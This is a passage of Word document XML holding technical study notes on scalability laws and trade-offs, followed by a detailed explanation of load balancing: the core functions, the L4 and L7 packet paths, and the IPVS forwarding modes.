    </w:p>
    <w:p w14:paraId="502E81DB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve">  Step 4: Repeat — find the next bottleneck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23388AF3" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B"/>
    <w:p w14:paraId="4B375555" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>The Scalability Laws:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D17B8B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve">  Amdahl's Law:    Max speedup bounded by sequential fraction — parallelize as much as possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137D38EC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve">  Universal Scalability Law: Coherency cost grows as N², eventually degrades throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FD7CC4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve">  Little's Law:   L = λW — latency and concurrency are linked; reducing one reduces the other</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A84C89" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve">  CAP Theorem:    Distributed scaling forces C vs A trade-off during partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8CFBBC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA23E94" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>The Fundamental Trade-offs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D478117" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve">  Consistency  ↔  Availability  (CAP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B303A94" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve">  Latency      ↔  Consistency   (PACELC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144416D6" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve">  Cost         ↔  Throughput    (vertical vs horizontal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132CC5C5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve">  Complexity   ↔  Scalability   (simple systems don't scale; scalable systems aren't simple)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ABC89F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>The deepest insight at a senior level: </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scalability is not achieved — it is continuously pursued.</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Every system that scales to 10x its original load develops new bottlenecks at the next order of magnitude. The companies that operate at planetary scale (Google, Amazon, Meta) don't have "the scalability solution" — they have </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>engineering cultures, tooling, and processes</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve"> for continuously identifying and eliminating bottlenecks as their systems grow. The architecture that handles 1M users will break at 10M, and the 10M architecture will break at 100M. Accepting this reality — and building systems that can be incrementally </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>evolved rather than completely rewritten — is the hallmark of senior-level scalability engineering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4D8D95" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00AD5AD3"/>
    <w:p w14:paraId="04080332" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Load Balancing — Deep Technical Breakdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426F52AE" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:pict w14:anchorId="335D902B">
          <v:rect id="_x0000_i2531" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C3BBEC" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Load Balancing Actually Is (The Real Problem)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470D16FD" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Load balancing is not simply "distributing traffic across servers." That is a consequence, not the definition. Load balancing is the discipline of </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>managing the flow of work through a system such that no resource becomes the limiting constraint while other resources sit idle.</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> It is fundamentally about </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>resource utilization optimization under uncertainty</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> — you don't know which requests are coming, how long they'll take, or which backends are healthy at any given moment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C37C1F9" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>The deeper problem load balancing solves is the </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impedance mismatch</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> between client demand patterns and server capacity. Clients generate traffic in unpredictable bursts. Servers have fixed, finite capacity. Left unmanaged, some servers become overwhelmed while others are idle — a catastrophic waste that directly translates to poor user experience and wasted infrastructure cost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62195408" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Load balancing also solves the </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>single point of failure</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> problem — a single server that handles all traffic means one server failure brings down the entire system. Distributing across multiple servers means individual failures are absorbed without system-wide impact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B9AA4D" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>The engineering depth of load balancing lies in </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>how</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> traffic is distributed, </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>what information</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> the load balancer uses to make decisions, </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>how quickly</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> it adapts to changing conditions (backend failures, traffic surges, latency spikes), and </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>what trade-offs</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> each approach makes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC6F4F5" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:pict w14:anchorId="277095B1">
          <v:rect id="_x0000_i2532" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B0428F" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. The Anatomy of a Load Balancer — What It Actually Does</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F62802" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>A load balancer is fundamentally a </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>traffic proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> that sits between clients and backend servers. Every packet or connection passes through it. Its core functions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1669E08C" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Four Core Functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D80C3C" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. Traffic Distribution:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Decide which backend server handles each incoming request. The intelligence here ranges from round-robin (dumb, fast) to real-time load-aware routing (smart, expensive). Every other function serves this one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595A4E89" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Health Management:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Continuously determine which backends are capable of serving requests. Remove unhealthy backends. Re-add recovered backends. The speed and accuracy of health management directly determines how quickly the system recovers from failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7883B79B" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Session Persistence:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Ensure that requests from the same client consistently reach the same backend when the application requires it (session state, cache warming, stateful protocols). This conflicts with perfect load distribution — the tension between these two is a fundamental load balancer design problem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7027AD57" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Observability:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Expose metrics about traffic flow, backend health, connection counts, error rates, and latency distributions. Load balancers sit at the system's edge — they see everything — making them ideal observability collection points.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D31E282" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Happens to a Packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCB7177" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>When a TCP SYN arrives at a load balancer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CCACB6" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>L4 path (transport layer):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070A8ABA" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>The NIC receives the packet and places it in a ring buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A78B56C" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>An interrupt (or NAPI poll) transfers the packet to the kernel's network stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D4BE62" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>The kernel's netfilter framework intercepts the packet via hooks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5398A0C0" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>ipvs (IP Virtual Server) or iptables rules match the destination IP/port against a VIP (Virtual IP) rule.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215BB5DA" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>NAT (Network Address Translation) rewrites the destination IP from the VIP to a chosen backend's real IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565C2657" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>The packet is forwarded to the backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2837AFA6" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="238"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>The backend's response is NAT'd back (source IP rewritten from backend's real IP to VIP) before delivery to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5A3730" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>The client always communicates with the VIP — it never knows which backend server is behind it. The entire NAT operation happens </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>in kernel space</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>, without any user-space process involvement, which is why L4 load balancing can handle millions of packets per second.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F041C01" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>L7 path (application layer):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB33E08" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="239"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>The load balancer's user-space process (Nginx, HAProxy, Envoy) accepts the TCP connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565FB9C8" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="239"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Completes TLS handshake with the client (SSL termination).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316717AE" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="239"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Reads the HTTP request headers from the TLS-decrypted stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0448DF" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="239"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Parses request metadata: URL path, Host header, cookies, custom headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6C8AF9" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="239"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Applies routing rules to select a backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351C44E1" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="239"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Selects an existing connection from the backend connection pool (or establishes a new one).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188B3E16" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="239"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Forwards the request (re-encoding it in HTTP/1.1 or HTTP/2 format appropriate for the backend).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D99D5F" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="239"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Receives the backend's response, applies any response transformations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27771503" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="239"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>Writes the response back to the client connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6DE337" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>The critical difference: the L7 load balancer </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>terminates and re-initiates</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> both the client-facing and backend-facing connections. It is a full application-layer proxy, not a packet forwarder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B287A0" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:pict w14:anchorId="252B7980">
          <v:rect id="_x0000_i2533" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7409EC60" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Layer 4 vs Layer 7 — The Deep Technical Differences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBE0467" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Layer 4 — Kernel-Space Packet Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BBC20E" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implementation mechanisms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5510565F" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IPVS (IP Virtual Server):</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> Linux kernel module, part of the LVS (Linux Virtual Server) project. Maintains a connection hash table in kernel space mapping (src_ip, src_port, dst_ip, dst_port) 4-tuples to backend selections. Packet processing never leaves the kernel — </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>zero user-space overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECE58B2" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9" w:rsidP="002D1EC9">
      <w:r w:rsidRPr="002D1EC9">
        <w:t>IPVS supports three forwarding modes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2D8ADD" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="240"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NAT mode:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> LB rewrites destination IP/port of incoming packets and source IP/port of outgoing packets. Both request and response traffic flows through the LB. Simple but the LB becomes the bandwidth bottleneck — it must handle all traffic in both directions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57353732" w14:textId="77777777" w:rsidR="002D1EC9" w:rsidRPr="002D1EC9" w:rsidRDefault="002D1EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="240"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DR (Direct Routing) mode:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:t> LB rewrites the destination MAC address (Layer 2) rather than IP address. Backends must have the VIP configured on their loopback interface (so they accept packets addressed to the VIP). Backends respond </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>directly to clients</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1EC9">
